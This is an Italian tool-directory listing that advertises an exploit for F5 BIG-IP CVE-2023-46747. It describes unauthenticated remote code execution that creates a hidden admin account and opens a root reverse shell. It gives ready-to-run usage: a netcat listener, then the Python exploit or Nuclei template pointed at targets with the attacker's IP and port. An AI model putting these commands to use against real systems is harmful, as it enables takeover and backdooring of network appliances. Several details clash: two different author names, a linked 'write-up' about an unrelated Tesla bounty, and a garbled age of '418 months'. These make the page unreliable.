Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – RCE non autenticata Exploit Python e template Nuclei di Raguraman ✓ Reverse shell TCP automatizzata (LHOST/LPORT) ✓ Testato sulle versioni interessate di BIG-IP 13.x–17.x ⚠️ Solo pentesting autorizzato | Kitploit
Strumenti/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – RCE non autenticata Exploit Python e template Nuclei di Raguraman ✓ Reverse shell TCP automatizzata (LHOST/LPORT) ✓ Testato sulle versioni interessate di BIG-IP 13.x–17.x ⚠️ Solo pentesting autorizzato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
418 mesi faNon ancora revisionato

F5 BIG-IP CVE-2023-46747 – RCE non autenticato + Reverse Shell

Versioni Python3 e Nuclei – di raguraman

RCE critico non autenticato (CVSS 9.8) tramite AJP + HTTP request smuggling
Funziona su tutti i BIG-IP 13.x → 17.x non aggiornati (inclusa l'ultima versione 17.1.0.3)
Patch: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)

Write-up dell'exploit reale: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

Caratteristiche

  • Completamente automatizzato (nessun passaggio manuale)
  • Funziona con nome di dominio O IP grezzo
  • Crea un utente admin nascosto
  • Reverse shell TCP istantanea (root)
  • Output pulito con credenziali + token

File

  • f5-bigip-cve-2023-46747-revshell.py → Python3 autonomo (consigliato)
  • CVE-2023-46747-revshell.yaml → template Nuclei (opzionale)

Utilizzo – Python3 (il più veloce e affidabile)

root@kitploit:~
# 1. Avvia il tuo listener
nc -lvnp 4444

# 2. Esegui l'exploit (funziona con IP o dominio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   TUO_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com TUO_IP 4444

# → Shell root istantanea!

Utilizzo – Template Nuclei (alternativa)

root@kitploit:~
# 1. Modifica LHOST e LPORT all'interno del file YAML
# 2. Avvia il listener
nc -lvnp 4444

# 3. Scansiona
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

Avviso Legale

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati, come ad esempio:

  • Incarichi di penetration testing approvati
  • Operazioni red team con permesso scritto
  • Ricerca in un ambiente di laboratorio controllato

Non utilizzare questo exploit su sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare. Lo sfruttamento non autorizzato è illegale e può comportare azioni penali.

Utilizzando questo strumento, accetti ogni responsabilità per la conformità alle leggi applicabili. L'autore non è responsabile per usi impropri o danni.

Scarica lo strumento